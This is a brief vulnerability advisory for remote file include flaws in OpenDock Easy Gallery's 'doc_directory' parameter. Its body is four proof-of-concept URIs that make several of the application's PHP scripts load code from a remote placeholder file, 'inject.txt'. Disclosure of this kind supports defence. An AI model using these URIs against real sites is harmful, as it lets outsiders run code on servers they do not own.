|
Easy Gallery Doc_Directory Parameter Multiple Remote File Include Vulnerabilities
An attacker can exploit this issue via a web client. The following proof-of-concept URIs are available: http://www.example.com/[OpenDockEasyGallery_Path]/sw/lib_user/find_user.php?doc_directory=http://www.example.com/inject.txt? http://www.example.com/[OpenDockEasyGallery_Path]/sw/lib_user/user.php?doc_directory=http://www.example.com/inject.txt? http://www.example.com/[OpenDockEasyGallery_Path]/sw/lib_comment/comment.php?doc_directory=http://www.example.com/inject.txt? http://www.example.com/[OpenDockEasyGallery_Path]/sw/lib_session/session.php?doc_directory=http://www.example.com/inject.txt? |
|
|
Privacy Statement |
